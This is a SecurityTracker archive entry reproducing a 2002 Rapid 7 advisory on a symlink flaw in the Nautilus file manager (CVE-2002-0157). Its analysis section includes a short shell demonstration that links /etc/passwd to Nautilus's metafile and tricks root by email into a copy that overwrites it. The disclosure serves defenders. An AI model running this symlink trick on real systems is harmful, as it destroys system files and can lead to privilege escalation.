SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Generic)  >   Nautilus (GNOME) Vendors:   Gnome Development Team
Nautilus GNOME Shell and File Manager Symlink Hole May Let Local Users Cause Other Users' to Overwrite Files on the System
SecurityTracker Alert ID:  1004212
SecurityTracker URL:  http://securitytracker.com/id/1004212
CVE Reference:   CVE-2002-0157   (Links to External Site)
Date:  May 2 2002
Impact:   Modification of system information, Modification of user information, Root access via local system, User access via local system
Fix Available:  Yes  Vendor Confirmed:  Yes  
Version(s): 1.0.4
Description:   A temporary file symbolic link (symlink) vulnerability was reported in Nautilus, the GNOME shell and file manager. A local user could cause another user to overwrite files on the system. In some cases, this could allow a local user to obtain root privileges on the system.

Rapid 7 reports that when a local user copies files from one directory to another directory, Nautilus will create a small (88+ bytes) XML file named '.nautilus-metafile.xml' in the target directory. The software apparently does not check to see if a symlink with the same name already exists before writing to it.

A local user could create a symlink from a critical file to the appropriate Nautilus XML file name in a certain directory. Then, the local user could convince another user on the system to copy a file to the certain directory. When the other user performs this copy function using Nautilus, Nautilus will write to the XML file, causing the linked file to be overwritten with the privileges of the other user.

Impact:   A local user can cause files to be overwritten by other users when the other users invoke Nautilus to perform certain copying functions. If the "other user" is a root-level user, then the local user could obtain root level access on the system.
Solution:   The vendor has reportedly released a fix in CVS. Download a more recent version from:

http://cvs.gnome.org/lxr/source/nautilus/

Vendor URL:  nautilus.eazel.com/ (Links to External Site)
Cause:   Access control error, State error
Underlying OS:  Linux (Any), UNIX (Any)

Message History:   This archive entry has one or more follow-up message(s) listed below.
(Red Hat Issues Fix) Re: Nautilus GNOME Shell and File Manager Symlink Hole May Let Local Users Cause Other Users' to Overwrite Files on the System
Red Hat has issued a fix.



 Source Message Contents

Subject:  Nautilus Symlink Vulnerability


_____________________________________________________________________
                   Rapid 7, Inc. Security Advisory

          Visit http://www.rapid7.com/ to download NeXpose(tm), our
          advanced vulnerability scanner. Linux and Windows 2000
          versions are available now!
_______________________________________________________________________

Rapid 7 Advisory R7-000x: Nautilus Symlink Vulnerability

    Published:  Not yet published.
    Revision:   1.0
    CVE ID:     CAN-2002-0157
    Bugtraq ID: Not yet assigned.

1. Affected system(s):

    KNOWN VULNERABLE:
     o Nautilus 1.0.4

    Apparently NOT VULNERABLE:

2. Summary

    Nautilus is a graphical shell for GNOME.  It contains a
vulnerability
    which would allow a malicious user to mount a symlink attack to
overwrite
    another user's files.

    The Common Vulnerabilities and Exposures (CVE) project has assigned
    the identifier CAN-2002-0157 to this issue. This is a candidate for
    inclusion in the CVE list (http://cve.mitre.org/), which
standardizes
    names for security problems.

    BUGTRAQ has assigned the identifier xxx to this vulnerability.
    More information on BUGTRAQ can be found at
    http://www.securityfocus.com/.

3. Vendor status and information

    Nautilus
    Eazel, Inc.
    http://nautilus.eazel.com/

Vendor notified 03/26/2002.

4. Solution



5. Detailed analysis

    When copying files from one directory to another, Nautilus creates a
small
    (88+ bytes) XML file called '.nautilus-metafile.xml' in the target
    directory.  It does not check if a symlink with the same name
already
    exists there, and blindly writes XML data to it.  The following
example
    shows how to cause a system-wide denial of service attack with this
    vulnerability:

    [jdog@imisshogs jdog]$ pwd
    /home/jdog
    [jdog@imisshogs jdog]$ cat /etc/passwd
    root:x:0:0:root:/root:/bin/bash
    bin:x:1:1:bin:/bin:/sbin/nologin
    daemon:x:2:2:daemon:/sbin:/sbin/nologin
    adm:x:3:4:adm:/var/adm:/sbin/nologin
    lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
    [...snip...]
    jdog:x:500:500::/home/jdog:/bin/bash
    [jdog@imisshogs jdog]$ ln -s /etc/passwd .nautilus-metafile.xml
    [jdog@imisshogs jdog]$ mail root
    Subject: Yo.
        Could you please copy "lonely-in-new-york.doc" to my home
directory
    (/home/jdog)?  Thanks.

        - Joe
    Cc: 
    [jdog@imisshogs jdog]$ sleep 86400
    [jdog@imisshogs jdog]$ ls -l *.doc                  
    -rw-r--r--    1 root     root           13 Mar 24 18:09
lonely-in-new-york.doc
    [jdog@imisshogs jdog]$ cat /etc/passwd
    <?xml version="1.0"?>
<directory>
<file name="lonely-in-new-york.doc" icon_position="55,105"/>
</directory>
[jdog@imisshogs jdog]$

6. Contact Information

       Rapid 7 Security Advisories
       Email:   advisory@rapid7.com
Web:     http://www.rapid7.com/
Phone:   +1 (212) 558-8700

7. Disclaimer and Copyright

    Rapid 7, Inc. is not responsible for the misuse of the information
    provided in our security advisories. These advisories are a service
    to the professional security community.  There are NO WARRANTIES
    with regard to this information. Any application or distribution of
    this information constitutes acceptance AS IS, at the user's own
    risk.  This information is subject to change without notice.

    This advisory Copyright (C) 2002 Rapid 7, Inc.  Permission is
    hereby granted to redistribute this advisory in electronic media
    only, providing that no changes are made and that the copyright
    notices and disclaimers remain intact.  This advisory may not be
    printed or distributed in non-electronic media without the
    express written permission of Rapid 7, Inc.


 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, SecurityGlobal.net LLC